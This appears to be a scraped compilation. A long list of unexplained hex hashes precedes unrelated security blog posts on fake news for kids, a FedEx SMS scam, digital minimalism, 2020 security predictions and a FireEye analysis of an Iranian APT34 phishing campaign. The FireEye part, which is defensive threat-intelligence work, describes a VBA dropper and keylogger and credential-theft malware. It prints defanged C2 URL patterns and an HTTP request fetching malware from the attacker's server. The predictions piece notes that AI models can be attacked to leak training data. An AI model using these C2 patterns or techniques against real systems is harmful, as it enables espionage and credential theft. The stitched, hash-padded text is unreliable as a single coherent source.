65ead629a55e953b31668aac3bd373e229c45eb1871d8466f278f39ebcd5d26b

0dd556bf03ecb42bf87d5ea7ce8efafe

48f6810e50d08c2631f63aae307a7724dba830430f5edd4b90b4b6a5b3c3ca85

15edac65d5b5ed6c27a8ac983d5b97f6

03ff2b3067aa73ecd8830b6b0ea4f7cfa1c7476452b26227fb433265e7206525

1e9c836f997ddcbd13de35a0264cf9f1

23da418912119a1358c9a1a4671ba60c396fff4c4de225fe6a225330147549a7

21aa1066f102324ccc4697193be83741

86d839e1d741445f194965eee60d18bd292bec73e4889089e6caf9877581db12

22b7ddf4983d6e6d84a4978f96bc2a82

fc39cb08cae90c661e00718e2a0051b5de3dcb7cddde919b9ffd2d79bf923d1f

2333fbadeea558e57ac15e51d55b041c

57671d5154e707da0ee6139485f45a50fa9221852ebb65781d45a2660da7d0cb

2b9961f31e0015cbcb276d43b05e4434

e41b89869c2b510c88acd1ed9fd4a6dfe89222a81c6c1241a69af3b7f812f712

2c3cb2132951b63036124dec06fd84a8

b6dbb902125e7bf6f6701b654cbff4abaf2e853441cf34045ac19eff5ed8ce84

4de9d6073a63a26180a5d8dcaffb9e81

7b1d4774176976ffcb2075889557f91a43c05fb13f3bc262bbaec4d7a0a827e6

505ff4b9ef2b619305d7973869cd1d2b

abb05ba50f45742025dd4ebff2310325783da00fb7bc885783e60a88c5157268

52d6654fe3ac78661689237a149a710b

d6a0e62fe53116c9b5bccd2a584381e2ca86e35490d809ce1900603d5e6b53eb

53e044cd7cea2a6239d8411b8befb4b7

6e76d648d446e6a70acdd491f04c52d17f9f0e1ef34890c6628c4f48725b47c8

5624c985228288c73317f2fa1be66f32

99559a5f06b0279ed893d2799b735dae450a620f6cea2ea58426d8b67d598add

598940779363d9f4203fbfe158d6829b

1358b0ccae9dbb493228dc94eb5722c8d34c12227a438766be83df8c1c92a621

60bdea2c493c812428a8db21b29dd402

383c86deed8797e0915acf3e0c1b6a4142c2c5ecb5d482517ed2ade4df6f36fd

681a77eba0734c0a17b02a81564ae73f

0aaa66dc983179bffdb181079f3b786b6cd587c38c67ba68b560db0bd873278a

6b7d9268c7000c651473f33d088a16bd

6e39ffecab4ca0bd7835a2e773ebfc3f6d909a0a680f898e55f85ed00728666d

6d6f50f7bba4ae0225e9754e9053edc0

ddf33eff293ffc268dfd0a33dddef97aefe9e010ec869dc22c221d197eb85740

6de77c1b4e8abaaf304b43162252f022

8f50ddc1519e587597882a6bd0667653c36a8064b56ee5ff77665db2faf24710

7004fadfa572d77e24b33d2458f023d1

cccd6b46f950caec5effdd07af339be78691974fec5f25d923932b35edb95c4a

71988460fd87b6bff8e8fc0f442c934b

8167d41ad30f5d451791878815e479965b2f5213231f26819ecaf4fcc774ab12

722981703148fa78d41abbae8857f7a2

a3070ee10dd5bcd65a45b72848c926db2602e5297641452edff66e7133cdce9c

818f7af373d1ec865d6c1b7f59dc89e5

cbe4b73c0c95c207ccde9d9bd80f541cf90cad18ba5abc3fe66a811ead1601c2

832052b0f806f44b92f6ef150573af81

e162a70a6e27fe23379d3a17a3a727d85a94b79416d81ec3b4ea80d329e96830

836125ae2bed57be93a93d18e0c600e8

0fbde653bef4642626f2996a41a15a635eb52cd31eacce133d28301b902d67df

86d60bce47c9bb6017e3da26cab50dcf

6c134908ad74dfa1468a1166e7d9244695f1ffeff68bfd4eec4b35820b542b8a

8919458aec3dcc90563579a76835fc54

aad0537924bacddd0d5872f934723e765dbb182f2804c6f594f9b051937495ec

8d7e220af48fceee515eb5e56579a709

3eefa7072344e044c0a6abb0030f3f26065bf6a86bb50ea38473dd7ac73904fb

91b8ec04d8b96b90ea406c7b98cc0ad6

0520e68a4b73c3b41e566cf07be54e1f1cb59c59c303fe3390e0687f9af1a58a

959eb0696c199cbf60ec8f12fcf0ea3c

ccb5f8734befd6ab218513e16a57679a8fb43b2732e19233ee920d379045e318

95ec5e8d87111f7f6b2585992e460b52

3f8e38ccf71f122b65fdc679db13e3de3bb4b4fc04b8ab6f955d02e0bca10fae

9606cf0f12d6a00716984b5b4fa49d7d

f4f062fd7b98365ed6db993b1da586dd43e5cdcc2f00a257086734daf88c9abb

9f7fed305c6638d0854de0f4563abd62

6c5f72ddf0262838a921107520cdc12ba8e48dbafab4a66732a350095dd48e9f

a11c0b9f3e7fedfe52b1fc0fc2d4f6d1

d35ac29ea6e064b13d56f6a534022f253cf76b98e10a7ea1cbfa086eefd64f4b

a47915a2684063003f09770ba92ccef2

7b16ce0d2443b2799e36e18f60fe0603df4383b1a392b0549c3f28159b1ca4d4

a917b2ec0ac08b5cde3678487971232a

8578bff803098bf5ca0d752d0a81f07659688a32cbfc946728e5ab0403f5c4ba

ad06205879edab65ed99ed7ff796bd09

d560f8717f4117d011f40c8880081d02d1455a41c93792e1600799d3e5ee9421

ad910001cb57e84148ef014abc61fa73

c9a6f7b0603779690c1d189850403f86608a3c5e1cd91e76fd31c4f119ae256b

b1ce55fca928cf66eaa9407246399d2c

c6214ec7909ce61d6ec3f46f5a7ec595d8cc8db48965c5baee8a346632cbe16d

b9249e9f1a92e6b3359c35a8f2a1e804

0695e5e49a297c980b96f76bf10e5540de188d6a6a162e38f475418d72a50032

bd6880fb97faceecf193a745655d4301

23840c587e4e9588b3d0795d4d76a4f3d4d5b2e665ce42dde0abcd1e0a2ba254

be2597a842a7603d7eb990a2135dab5e

6288d3de1f1aa05fa0a5f0c8eb9880d077f034fc79fc20f87cbfcc522aa803cb

cf5470bfe947739e0b4527d8adb8486a

6357fdb8f62948d489080b61caf135e6aaba32dcdb7dc49b0efafef178b3b54f

d593b7847ec5d18a7dba6c7b98d9aebf

5df3a6afb1a56fa076c6db716d5a050455158941ec962546a8799fc80ccfa573

d7ee4ffce21325dfe013b6764d0f8986

92e94482dee75261c8ebdcbb7ace382a097cca11bcdc675bbe2d7b3f67525f84

de4d7796006359d60c97a6e4977e4936

ee8ba1c5329d928d542bfa06eec2c0a3e3b97dcc20382ddbc27bc420ceaeb677

e0069cd3b5548f9fd8811adf4b24bf2e

6046d6aed3f4ee2564d6be540d46bcdc0bebce11a1ced4b9ddbfa1a41084411c

e1ea93fa74d160c67a9ff748e5254fe0

92c10ef23209e09abb17e41d67301f0e3f7d9e7ddfc7c1a66140c4986d72bee7

ea15d7944c29f944814be14b25c2c2b1

5898b41ca4f4777ad04d687f93548129ccb626d2f5e6e100b0a037c3d40a7444

f22a4abd5217fa01b56d064248ce0cc5

858b4070f8b83aa43fd6a5189a8ed226ce767a64972db893e36550a25b20be94

f3cb175e725af7f94533ecc3ff62fa12

5a5385df469459cd56f6eecbf4b41b8c75aa17220c773501eaec22731f3a41bb

f6533e09a334b9f28136711ea8e9afca

9136c36ccd0be71725e8720a6cfdbdd38d7eea3998228c69ed4b52e78ba979c4

f7daaea04b7fe4251b6b8dabb832ee3a

6abd90d718113482a5bcd36e35b4ea32c469f94fc2cfb9c1c98214efbf64c352

fb1555210d04286c7bcb73ca57e8e430

36da56815dc0c274fc8aacdfffbc4d5e500025ccd1147cad513d59b69ab9557d

 

Spotting Fake News: Teaching Kids to be Responsible Online Publishers

fake news

Editor’s note: This is part II in a series on Fake News. Read part I, here.

Kids today are not equipped to deal with the barrage of digital information coming at them every day. Add to that, the bulk of information that may be fake, misleading, or even malicious. So how do we help kids become more responsible for the content they share online?

We do it one conversation at a time.

When it comes to the mounting influence of fake news, it’s easy to point the finger at the media, special interest groups, politicians, and anyone else with an agenda and internet access. While many of these groups may add to the problem, each one of us plays a role in stopping it.

What’s our role?

We, the connected consumer, now play such a significant role in how content is created and disseminated, that a large part of the solution comes down to individual responsibility — yours and mine.

The shift begins with holding ourselves accountable for every piece of content we read, create, or share online. That shift gains momentum when we equip our kids to do the same.

Teach personal responsibility. Start the conversation around personal responsibility early with your kids and keep it going. Explain that every time we share fake news, a rumor, or poorly sourced material, we become one cog in the wheel of spreading untruths and even malicious fabrications. We become part of the problem. Challenge your child to become a trustworthy, discerning source of information as opposed to being viewed by others as an impulsive, unreliable source.

Discuss the big picture. Fake news or misleading content isn’t just annoying; it’s harmful in a lot of other ways. Misinformation undermines trust, causes division, can spark social unrest, and harm unity. More than that, fake news edges out helpful, factual, content designed to educate and inform.

Be aware of confirmation bias. Confirmation bias is gravitating toward ideas, people, and content that echoes our spiritual, social, political, or moral points of view. Confirmation bias tempts us to disregard information that opposes our ideology. While confirmation bias is part of our human nature, left unchecked, it can be an obstacle to learning factual information.

Chill, don’t spill. Fake news is designed to advance a personal agenda. This is especially true during times of social tension when tempers are running high. Don’t take the emotional bait. Exercise discernment. Before sharing, read legitimate news sources that offer balanced coverage, so the story you share or opinion you express is based on accurate information.

Be a free thinker. Our kids have grown up in a world where ‘like’ and ‘share’ counts somehow equate to credibility. Encourage kids to break away from the crowd and have the courage to be free, independent thinkers.

Challenge content by asking:

  • Do I understand all the points of view of this story?
  • What do I really think about this topic or idea?
  • Am I overly emotional and eager to share this?
  • Am I being manipulated by this content?
  • What if I’m wrong?

Question every source. Studies show that people assume that the higher something ranks in search results, the more factual or trustworthy the information is. Wrong. Algorithms retrieve top content based on keywords, not accuracy. So, dig deeper and verify sources.

5 ways to spot fake news

1. Look closely at the source. Fake news creators are good at what they do. While some content has detectable errors, others are sophisticated and strangely persuasive. So, take a closer look. Test credibility by asking:

  • Where is the information coming from? 
  • Is this piece satire?
  • Is the author of the article, bio, and website legitimate? 
  • Are studies, infographics, and quotes appropriately attributed?
  • Is the URL legitimate (cnn.comvs. cnn.com.co)?
  • Are there red flags such as unknown author, all capital letters, misspellings, or grammar errors?

2. Be discerning with viral content. Often a story will go viral because it’s so unbelievable. So pause before you share. Google the story’s headline to see if the story appears in other reliable publications.

3. Pay attention to publish dates, context. Some viral news items may not be entirely false, just intentionally shared out of context. Fake news creators often pull headlines or stories from the past and present them as current news to fit the desired narrative.

4. Beware of click-bait headlines. A lot of fake news is carefully designed with user behavior in mind. A juicy headline leads to a false news story packed with even more fake links that take you to a product page or, worse, download malware onto your computer, putting your data and privacy at risk. These kinds of fake news scams capitalize on emotional stories such as the recent tragic death of basketball great Kobe Bryant.

5. Verify information. It takes extra effort, but plenty of sites exist that can help you verify a piece of information. Before sharing that a piece of content, check it out on sites like:

  • Snopes.com
  • Factcheck.com
  • Politifact.org
  • Opensecrets.org
  • Truthorfiction.com
  • Hoaxslayer.com

While fake news isn’t a new phenomenon, thanks to technology’s amplification power, it’s reached new levels of influence and deception. This social shift makes it imperative to get in front of this family conversation as soon as possible especially since we’re headed into an election year.

The post Spotting Fake News: Teaching Kids to be Responsible Online Publishers appeared first on McAfee Blogs.

What You Need to Know About the FedEx SMiShing Scam

You receive a text message saying that you have a package out for delivery. While you might feel exhilarated at first, you should think twice before clicking on that link in the text. According to CNN, users across the U.S. are receiving phony text messages claiming to be from FedEx as part of a stealthy SMS phishing (SMiShing) campaign.

How SMiShing Works

This SMiShing campaign uses text messages that show a supposed tracking code and a link to “set delivery preferences.” The link directs the recipient to a scammer-operated website disguised as a fake Amazon listing. The listing asks the user to take a customer satisfaction survey. After answering a couple of questions, the survey asks the user to enter personal information and a credit card number to claim a free gift, which still requires a small shipping and handling fee. But according to HowtoGeek.com, agreeing to pay the small shipping fee also signs the user up for a 14-day trial to the company that sells the scam products. After the trial period, the user will be billed $98.95 every month. What’s more, the text messages use the recipient’s real name, making this threat even stealthier.

How to Stay Protected

So, what can online shoppers do to defend themselves from this SMiShing scam? Check out the following tips to remain secure:

  • Be careful what you click on. Be sure to only click on links in text messages that are from a trusted source. If you don’t recognize the sender, or the SMS content doesn’t seem familiar, stay cautious and avoid interacting with the message.
  • Go directly to the source. FedEx stated that it would never send text messages or emails to customers that ask for money or personal information. When in doubt about a tracking number, go to the main website of the shipping company and search the tracking number yourself.
  • Enable the feature on your mobile device that blocks texts from the Internet. Many spammers send texts from an Internet service in an attempt to hide their identities. Combat this by using this feature to block texts sent from the Internet.
  • Use mobile security software. Make sure your mobile devices are prepared any threat coming their way. To do just that, cover these devices with a mobile security solution, such as McAfee Mobile Security.

To stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post What You Need to Know About the FedEx SMiShing Scam appeared first on McAfee Blogs.

Less is More: 5 Ways to Jumpstart a ‘Digital Minimalist’ Mindset  

digital minimalism

Editor’s Note: This is part II of a series on Digital Minimalism in 2020.

Is this the year you rethink and rebuild your relationship with technology? If so, embracing digital minimalism may be the most powerful way to achieve that goal.

We learned last week in our first post on this series tht digital minimalism isn’t about chucking your devices and going off the grid. It’s about being hyper intentional that your technology choices support the things you value.

And, as outlined by Cal Newport in his book, Digital Minimalism: Choosing a Focused Life in a Noisy World, the first step in the process is clarifying your values. Your values are the guiding principles that motivate you and give your life meaning such as family, education, work/life balance, community service, friendship, integrity, health, or wealth. With values clearly defined, you can evaluate every piece of technology, app, or social network you use to be sure it aligns with those values.

For instance, if you establish your top values to be family and volunteering, then maybe it’s time to let go of all the podcasts, apps, and email subscriptions that no longer support those priorities. The online social communities you habitually peruse may trigger anxiety and be taking time from activities that could be far more fulfilling.

If you get overwhelmed amid your technology pruning, come back to these two critical questions:

  • Does this technology directly support something that I deeply value?
  • Is this technology the best way to support this value?

digital minimalism

 

 

There’s a ton of great information as well as passion online around the concept of digital minimalism. But to keep this new idea “minimal” and easy to grasp, we’ve chosen 5 things you can do today to help you and your family jumpstart this new way of thinking.

5 ways to jumpstart a ‘digital minimalist’ mindset

  1. Make social accounts private. Last week we suggested cutting all non-essential media for 30 days. Another way to mentally shift into a minimalist mindset is to transition your social media accounts from public to private if you haven’t already. Not only will this small change increase your online privacy, but it could also help you become more aware of the amount of content you share, the people with whom you share it, and the value of what you share. For people who post frequently (and often out of habit), this may prove to be a game-changer. The goal of digital minimalism isn’t a digital detox or white-knuckling no-or-less-tech life. The goal is to consciously, willingly, and consistently be rebuilding your relationship with technology into a formula that decreases distraction and increases value.
  2. Audit those apps! Want to feel a rush of minimalist adrenaline? Whack some apps! Most of us have amassed a galaxy of apps on our phones, tablets, and laptops. Newport suggests getting rid of any apps or devices that continuously distract and are “outside of work.” Those brain games, cooking apps, calorie trackers, and delivery apps you rarely use or value, may no longer be relevant to your values. Some will find this exercise exhilarating, while others may feel panicked. If that’s the case, pace yourself and delete a handful of apps over the next few weeks. The goal is more peace, not panic. On a security note: Remember, apps are one of the main channels for malware. Consider adding security software to your family devices, reading app reviews, and only downloading trusted products.
  3. Reclaim your space. Do you carry your phone with you into restaurants, upstairs, on a walk, and even to the bathroom? If so, this step may be especially tricky but incredibly beneficial. Think about it — you weren’t born with a phone. Over the years, it became a companion, maybe even an extra appendage. So start small to reclaim your birthright to phone-free space. If you go outside to walk your dog, leave your phone inside. Are you headed into a restaurant? Leave the phone in the car. Newport also suggests leaving your phone in a fixed spot in your home and treating it like the “house phones” of the past. When you go to bed, leave your phone in another room. Over time, hopefully, these small changes will add more hours, sleep, relaxation, conversation, and contemplation to your day.
  4. Condense home screens, turn off all notifications. Clutter — especially digital clutter — can trigger feelings of chaos and anxiety. By creating folders for random files and apps on your laptop, tablet, and phone, you can declutter and breathe a little easier. If later you can’t find a document, use the search tool on your device. Also, turn off all notifications, including your phone ringer, to reduce interruptions and to avoid the temptation to phub (phone snub) the person in front of you.
  5. Replace device time with more productive activities. The pain and regret of the social media time suck are very real. We lose days, even years going down digital rabbit holes and getting emotionally invested in random social media posts and exchanges. Some ideas: If you are a night scroller, opt to read a physical book. If you take breaks to scroll during work hours, put your phone in a drawer — out of sight, out of mind. If you’ve defined “relaxing” as curling up with your coffee and phone and reading through social feeds, reclaim those hours by calling a friend, taking a walk, connecting with your family, reading, or getting outside.

Embracing a new mindset, especially when it comes to our sacred technology habits, won’t be an easy task. However, if you know (and yes, you do know) that technology is taking up too much of your time, attention, and emotional bandwidth, then 2020 may the perfect time to release digital distractions, rethink your technology choices, and reclaim the things that matter most.

The post Less is More: 5 Ways to Jumpstart a ‘Digital Minimalist’ Mindset   appeared first on McAfee Blogs.

12 days of Christmas Security Predictions: What lies ahead in 2020

Marked by a shortage of cyber security talent and attackers willing to exploit any vulnerability to achieve their aims, this year emphasised the need for organisations to invest in security and understand their risk posture. With the number of vendors in the cyber security market rapidly growing, rising standard for managing identities and access, and organisations investing more in security tools, 2020 will be a transformational year for the sector.

According to Rob Norris, VP Head of Enterprise & Cyber Security EMEIA at Fujitsu: “We anticipate that 2020 will be a positive year for security, and encourage public and private sector to work together to bring more talent to the sector and raise the industry standards. As the threat landscape continues to expand with phishing and ransomware still popular, so will the security tools, leaving organisations with a variety of solutions. Next year will also be marked by a rush to create an Artificial Intelligence silver-bullet for cyber security and a move from old-fashioned password management practices to password-less technologies.”

“As cyber criminals continue to find new ways to strike, we’ll be working hard to help our customers across the world to prepare their people, processes and technology to deal with these threats. One thing to always keep in mind is that technology alone cannot stop a breach - this requires a cultural shift to educate employees across organisations about data and security governance. After all, people are always at the front line of a cyber-attack.”

What will 2020 bring with Cybersecurity?

In light of this, Rob Norris shares his “12 Days of Christmas” security predictions for the coming year.

1. A United front for Cyber Security Talent Development
The shortage of cyber security talent will only get worse in 2020 - if we allow it to.

The scarce talent pool of cyber security specialists has become a real problem with various reports estimating a global shortage of 3.5 million unfulfilled positions by 2021. New approaches to talent creation need to be considered.

The government, academia, law enforcement and businesses all have a part to play in talent identification and development and will need to work collaboratively to provide different pathways for students who may not ordinarily be suited to the traditional education route. Institutions offering new cyber security courses for technically gifted individuals are a great starting point, but more will need to be done in 2020 if the shortage is to be reduced.

2. Cloud Adoption Expands the Unknown Threat Landscape 
It will take time for organisations to understand their risk posture as the adoption of cloud services grows.

While the transition to cloud-based services will provide many operational, business and commercial benefits to organisations, there will be many CISO’s working to understand the risks to their business with new data flows, data storage and new services. Traditional networks, in particular, boundaries and control of services are typically very well understood while the velocity and momentum of cloud adoption services leaves CISO’s with unanswered questions. Valid concerns remain around container security, cloud storage, cloud sharing applications, identity theft and vulnerabilities yet to be understood, or exposed.

3. The Brexit Effect 
Brexit will have far-reaching cyber security implications for many organisations, in many countries.

The UK and European markets are suffering from uncertainty around the UK’s departure from the European Union, which will affect the adoption of cyber security services, as organisations will be reticent to spend until the impact of Brexit is fully understood.

The implications of data residency legislation, hosting, corporation tax, EU-UK security collaboration and information sharing are all questions that will need to be answered in 2020 post-Brexit. There is a long-standing collaborative relationship between the UK and its EU counterparts including European Certs and Europol and whilst the dynamics of those working relationships should continue, CISO’s and senior security personnel will be watching closely to observe the real impact.

4. SOAR Revolution 
Security Orchestration, Automation and Response (SOAR) is a real game-changer for cyber security and early adopters will see the benefits in 2020 as the threat landscape continues to expand.

Threat intelligence is a domain that has taken a while for organisations to understand in terms of terminology and real business benefits. SOAR is another domain that will take time to be understood and adopted, but the business benefits are also tangible. At a granular level, the correct adoption of SOAR will help organisations map, understand and improve their business processes. By making correct use of their technology stack and associated API’s early adopters will get faster and enhanced reporting and will improve their security posture through the reduction of the Mean Time To Respond (MTTR) to threats that could impact their reputation, operations and bottom-line.

5. Further Market Fragmentation will Frustrate CISOs 
The number of vendors in the cyber security market has been rapidly growing and that will continue in 2020, but this is leading to confusion for organisations.

The cyber security market is an increasingly saturated one, often at the frustration of CISO’s who are frequently asked to evaluate new products. Providers that can offer a combined set of cyber security services that deliver clear business outcomes will gain traction as they can offer benefits over the use of disparate security technologies such as a reduction in contract management, discount provisioned across services, single point of contacts and reduction in services and technologies to manage.

Providers that continue to acquire security technologies to enhance their stack such as Endpoint Detection and Response (EDR) or technology analytics, will be best positioned to provide the full Managed Detection and Response (MDR) services that organisations need.

6. Artificial Intelligence (AI) will need Real Security 
2020 will see a rise in the use of adversarial attacks to exploit vulnerabilities in AI systems.

There is a rush to create an AI silver-bullet for cyber security however, there is currently a lack of focus on security for AI. It is likely we will see a shift towards this research area as “adversarial” approaches to neural networks could potentially divulge partial or complete data points that the model was trained on. It is also possible to extract parts of a model leading to intellectual property theft as well as the ability to craft “adversarial” AI which can manipulate the intended model. Currently, it is hard to detect and remediate these attacks.

There will need to be more focus on explainable AI, which would allow for response and remediation on what are currently black-box models.

7. Organisations will need to Understand how to make better use of Security Tools and Controls at their Disposal 
Customers will need to take better advantage of the security measures that they already have available. 

The well-established cloud platforms already contain many integrated security features but organisations are failing to take advantage of these features, partly because they do not know about them. A greater understanding of these features will allow organisations to make smarter investment decisions and we expect to see a growing demand for advice and services that allow organisations to optimally configure and monitor those technologies to ensure they have minimal risk and exposure to threats.

Fujitsu predicted last year that securing multi-cloud environments will be key going forward and organisations continue to need to find a balance of native and third-party tools to drive the right solution for their objectives.

8. Do you WannaCry again? 
The end of support for Windows Server 2008 and Windows 7 will open the door for well-prepared attackers.

January 2020 sees the official end of support life for all variants of Windows Server 2008 and Windows 7, which share elements of the same code base. This means that both end-user devices and data center servers will be equally vulnerable to the same exploits and opens the possibility that organisations could be susceptible to attacks that cause large outages.

In 2017, Wannacry surfaced and caused some well-publicised outages including well-known organisations from across the healthcare, manufacturing, logistics and aerospace industries. Microsoft had released patches two months before and recommended using a later version of the impacted components. We also learned in 2017, via Edward Snowden, that nation-states have built up an armoury of previously undisclosed exploits. These exploits are documented to target the majority of publicly available Operating Systems and so it stands to reason that cyber criminals could have also built a war chest of tools which will surface once the end of vendor support has passed for these Operating systems.

9. Rising the Standard for Managing Identities and Access
Federated Authentication, Single Sign-On and Adaptive Multi-Factor will become standard, if not required, practices in 2020.

2020 will see organisations continuing their adoption of hybrid and multi-cloud infrastructures and a ‘cloud-first’ attitude for applications. This creates the challenge of managing the expanding bundle of associated identities and credentials across the organisation.

Identities and associated credentials are the key attack vector in a data breach - they are ‘keys to the kingdom’. Without sufficient controls, especially for those with privileged rights, it is becoming increasingly difficult for organisations to securely manage identities and mitigate the risk of a data breach. Capabilities such as Federation Authentication, Single Sign-On and Adaptive Multi-Factor address the challenge of balance between security and usability, and we see this becoming standard, if not required, practice in 2020.

10. Extortion Phishing on the Rise 
Taboo lures enhanced phishing and social engineering techniques will prey on user privacy.

We are seeing an increase in a form of phishing that would have a recipient believe their potentially embarrassing web browsing and private activity has been observed with spyware and will be made public unless a large ransom is paid.

Since their widespread emergence last year, the techniques used by these extortionists to evade filters continue to develop. Simple text-only emails from single addresses now come from ‘burnable’ single-use domains. Glyphs from the Cyrillic, Greek, Armenian and extended Latin alphabets are being used to substitute letters in the email to bypass keyword filters and Bitcoin wallets are rotated often and used to associate a recipient with a payment.

The psychological tricks used in the wording of these emails will develop and likely aid their continued success.

11. Passwords become a Thing of the Past 
We will see increasing adoption of end-to-end password-less access, especially in scenarios where Privileged Access Management (PAM) is required.

Next year we will see a move from old-fashioned password management practices to password-less technologies. The increasing number of cases where privileged credentials and passwords are required, but are painful to manage in secure and cost effective, way will drive this shift. Passwords are easy to forget and the increasing complexity requirements placed upon users increases the chances of passwords having to be written down – which is self-defeating. Biometric technologies and ephemeral certificates will provide a more secure and user-friendly way to manage credentials and ensure assets and data are kept secure.

12. Ransomware not so Random
As more organisations employ negotiators to work with threat actors, ransomware is likely to decrease next year.

In 2019, we observed a shift in the way certain ransomware ransom notes were constructed. Traditionally, ransomware notes are generic template text informing the victim that their files are encrypted and that they must pay a set amount of Bitcoin in order to have their files unencrypted.

When threat actors successfully deploy ransomware network-wide and achieve other deployment objectives, they inform their victims their files are encrypted. Crucially, however, they do not reveal the price they demand for their decryption. Instead, threat actors seek to open a dialogue with the victim to discuss a price. This change has seen organisations employ negotiators to work with threat actors on managing and, hopefully, reducing the demand and we expect this to continue in 2020.

Hard Pass: Declining APT34’s Invite to Join Their Professional Network

Background

With increasing geopolitical tensions in the Middle East, we expect Iran to significantly increase the volume and scope of its cyber espionage campaigns. Iran has a critical need for strategic intelligence and is likely to fill this gap by conducting espionage against decision makers and key organizations that may have information that furthers Iran's economic and national security goals. The identification of new malware and the creation of additional infrastructure to enable such campaigns highlights the increased tempo of these operations in support of Iranian interests.

FireEye Identifies Phishing Campaign

In late June 2019, FireEye identified a phishing campaign conducted by APT34, an Iranian-nexus threat actor. Three key attributes caught our eye with this particular campaign:

  1. Masquerading as a member of Cambridge University to gain victims’ trust to open malicious documents,
  2. The usage of LinkedIn to deliver malicious documents,
  3. The addition of three new malware families to APT34’s arsenal.

FireEye’s platform successfully thwarted this attempted intrusion, stopping a new malware variant dead in its tracks. Additionally, with the assistance of our FireEye Labs Advanced Reverse Engineering (FLARE), Intelligence, and Advanced Practices teams, we identified three new malware families and a reappearance of PICKPOCKET, malware exclusively observed in use by APT34. The new malware families, which we will examine later in this post, show APT34 relying on their PowerShell development capabilities, as well as trying their hand at Golang.

APT34 is an Iran-nexus cluster of cyber espionage activity that has been active since at least 2014. They use a mix of public and non-public tools to collect strategic information that would benefit nation-state interests pertaining to geopolitical and economic needs. APT34 aligns with elements of activity reported as OilRig and Greenbug, by various security researchers. This threat group has conducted broad targeting across a variety of industries operating in the Middle East; however, we believe APT34's strongest interest is gaining access to financial, energy, and government entities.

Additional research on APT34 can be found in this FireEye blog post, this CERT-OPMD post, and this Cisco post.

Managed Defense also initiated a Community Protection Event (CPE) titled “Geopolitical Spotlight: Iran.” This CPE was created to ensure our customers are updated with new discoveries, activity and detection efforts related to this campaign, along with other recent activity from Iranian-nexus threat actors to include APT33, which is mentioned in this updated FireEye blog post.

Industries Targeted

The activities observed by Managed Defense, and described in this post, were primarily targeting the following industries:

  • Energy and Utilities
  • Government
  • Oil and Gas

Utilizing Cambridge University to Establish Trust

On June 19, 2019, FireEye’s Managed Defense Security Operations Center received an exploit detection alert on one of our FireEye Endpoint Security appliances. The offending application was identified as Microsoft Excel and was stopped immediately by FireEye Endpoint Security’s ExploitGuard engine. ExploitGuard is our behavioral monitoring, detection, and prevention capability that monitors application behavior, looking for various anomalies that threat actors use to subvert traditional detection mechanisms. Offending applications can subsequently be sandboxed or terminated, preventing an exploit from reaching its next programmed step.

The Managed Defense SOC analyzed the alert and identified a malicious file named System.doc (MD5: b338baa673ac007d7af54075ea69660b), located in C:\Users\<user_name>\.templates. The file System.doc is a Windows Portable Executable (PE), despite having a "doc" file extension. FireEye identified this new malware family as TONEDEAF.

A backdoor that communicates with a single command and control (C2) server using HTTP GET and POST requests, TONEDEAF supports collecting system information, uploading and downloading of files, and arbitrary shell command execution. When executed, this variant of TONEDEAF wrote encrypted data to two temporary files – temp.txt and temp2.txt – within the same directory of its execution. We explore additional technical details of TONEDEAF in the malware appendix of this post.

Retracing the steps preceding exploit detection, FireEye identified that System.doc was dropped by a file named ERFT-Details.xls. Combining endpoint- and network-visibility, we were able to correlate that ERFT-Details.xls originated from the URL http://www.cam-research-ac[.]com/Documents/ERFT-Details.xls. Network evidence also showed the access of a LinkedIn message directly preceding the spreadsheet download.

Managed Defense reached out to the impacted customer’s security team, who confirmed the file was received via a LinkedIn message. The targeted employee conversed with "Rebecca Watts", allegedly employed as "Research Staff at University of Cambridge". The conversation with Ms. Watts, provided in Figure 1, began with the solicitation of resumes for potential job opportunities.


Figure 1: Screenshot of LinkedIn message asking to download TONEDEAF

This is not the first time we’ve seen APT34 utilize academia and/or job offer conversations in their various campaigns. These conversations often take place on social media platforms, which can be an effective delivery mechanism if a targeted organization is focusing heavily on e-mail defenses to prevent intrusions.

FireEye examined the original file ERFT-Details.xls, which was observed with at least two unique MD5 file hashes:

  • 96feed478c347d4b95a8224de26a1b2c
  • caf418cbf6a9c4e93e79d4714d5d3b87

A snippet of the VBA code, provided in Figure 2, creates System.doc in the target directory from base64-encoded text upon opening.


Figure 2: Screenshot of VBA code from System.doc

The spreadsheet also creates a scheduled task named "windows update check" that runs the file C:\Users\<user_name>\.templates\System Manager.exe every minute. Upon closing the spreadsheet, a final VBA function will rename System.doc to System Manager.exe. Figure 3 provides a snippet of VBA code that creates the scheduled task, clearly obfuscated to avoid simple detection.


Figure 3: Additional VBA code from System.doc

Upon first execution of TONEDEAF, FireEye identified a callback to the C2 server offlineearthquake[.]com over port 80.

The FireEye Footprint: Pivots and Victim Identification

After identifying the usage of offlineearthquake[.]com as a potential C2 domain, FireEye’s Intelligence and Advanced Practices teams performed a wider search across our global visibility. FireEye’s Advanced Practices and Intelligence teams were able to identify additional artifacts and activity from the APT34 actors at other victim organizations. Of note, FireEye discovered two additional new malware families hosted at this domain, VALUEVAULT and LONGWATCH. We also identified a variant of PICKPOCKET, a browser credential-theft tool FireEye has been tracking since May 2018, hosted on the C2.

Requests to the domain offlineearthquake[.]com could take multiple forms, depending on the malware’s stage of installation and purpose. Additionally, during installation, the malware retrieves the system and current user names, which are used to create a three-character “sys_id”. This value is used in subsequent requests, likely to track infected target activity. URLs were observed with the following structures:

  • hxxp[://]offlineearthquake[.]com/download?id=<sys_id>&n=000
  • hxxp[://]offlineearthquake[.]com/upload?id=<sys_id>&n=000
  • hxxp[://]offlineearthquake[.]com/file/<sys_id>/<executable>?id=<cmd_id>&h=000
  • hxxp[://]offlineearthquake[.]com/file/<sys_id>/<executable>?id=<cmd_id>&n=000

The first executable identified by FireEye on the C2 was WinNTProgram.exe (MD5: 021a0f57fe09116a43c27e5133a57a0a), identified by FireEye as LONGWATCH. LONGWATCH is a keylogger that outputs keystrokes to a log.txt file in the Window’s temp folder. Further information regarding LONGWATCH is detailed in the Malware Appendix section at the end of the post.

FireEye Network Security appliances also detected the following being retrieved from APT34 infrastructure (Figure 4).

GET hxxp://offlineearthquake.com/file/<sys_id>/b.exe?id=<3char_redacted>&n=000
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0)
AppleWebKit/537.36 (KHTML, like Gecko)
Host: offlineearthquake[.]com
Proxy-Connection: Keep-Alive Pragma: no-cache HTTP/1.1

Figure 4: Snippet of HTTP traffic retrieving VALUEVAULT; detected by FireEye Network Security appliance

